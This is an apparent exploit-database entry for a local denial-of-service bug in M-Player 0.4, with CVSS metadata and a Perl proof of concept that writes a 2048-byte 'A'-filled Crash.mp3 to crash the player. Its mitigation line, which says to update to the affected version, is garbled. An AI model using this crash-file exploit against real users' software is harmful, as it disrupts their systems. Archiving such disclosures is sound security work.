header-logo
Suggest Exploit
vendor:
M-Player
by:
JaMbA
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: M-Player
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:m-player:m-player:0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2012

M-Player 0.4 Local Denial of Service Vulnerability

M-Player 0.4 is vulnerable to a local denial of service attack. By creating a specially crafted MP3 file with a size of 2048 bytes, an attacker can cause the application to crash when the file is opened.

Mitigation:

Update to the latest version of M-Player 0.4
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit Title: M-Player 0.4 Local Denial of Service Vulnerability
# Date: 08/01/2012
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml
# Version: 0.4
# Tested on: Windows 7

my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ I'am From Tunisia (Ahmadso best Friend)\n";
print "\ Dz-Devloper Work Team (wanted_29  Dr.Smt  z4k!_xy  ak27 DR.KIM
Samoray Mr_Ghost)\n";
close($FILE);

Navigation

Suggest Exploit

Services By CQR